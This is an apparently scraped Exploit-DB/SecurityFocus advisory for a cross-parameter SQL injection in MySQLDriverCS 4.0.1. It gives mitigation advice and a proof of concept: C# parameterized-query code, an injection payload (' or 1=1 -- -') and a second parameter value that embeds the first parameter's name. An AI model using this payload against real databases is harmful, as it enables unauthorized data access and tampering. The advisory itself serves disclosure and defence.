MySQLDriverCS SQL Injection Vulnerability

vendor:

MySQLDriverCS

by:

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: MySQLDriverCS

Affected Version From: MySQLDriverCS 4.0.1

Affected Version To: Potentially other versions

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

MySQLDriverCS SQL Injection Vulnerability

The MySQLDriverCS application is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Mitigation:

To mitigate this vulnerability, it is recommended to properly sanitize user-supplied input before using it in SQL queries. Prepared statements or parameterized queries can be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/48466/info

MySQLDriverCS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

MySQLDriverCS 4.0.1 is vulnerable; other versions may also be affected.

There is an example for illustrating the attack against the vulnerability:
----------------------------------------------------------------------
DataTable dt = new DataTable();
MySQLConnection conn = new MySQLConnection(CONN_STRING);
MySQLDataAdapter Cmd = new MySQLDataAdapter();
string sCmdText = "SELECT * FROM filelist where FILENAME=@sFileName AND LANGUAGE=@sLanguage";
Cmd.SelectCommand = new MySQLCommand(sCmdText, conn);
Cmd.SelectCommand.Connection.Open();
Cmd.SelectCommand.Parameters.Add(new MySQLParameter("@sFileName", SqlDbType.VarChar));
Cmd.SelectCommand.Parameters["@sFileName"].Value = sFileName;
Cmd.SelectCommand.Parameters.Add(new MySQLParameter("@sLanguage", SqlDbType.VarChar));
Cmd.SelectCommand.Parameters["@sLanguage"].Value = sLanguage;
Cmd.Fill(dt);
Cmd.SelectCommand.Connection.Close();
----------------------------------------------------------------------

Assigning (one parameter is assigned with SQL injection attack vector, while another one is assigned with a string which contains the parameter name of the first.):
----------------------------------------------------------------------
@sFileName: " or 1=1 -- -"
@sLanguage: "cn@sFileName"
----------------------------------------------------------------------

Then, the final sql query statement executed by Mysql is as following:
----------------------------------------------------------------------
SELECT * FROM filelist where FILENAME=' or 1=1 -- -' AND LANGUAGE='cn' or 1=1 -- -''
----------------------------------------------------------------------
Of course, we should use two parameters to launch a cross-parameter SQL injection attack.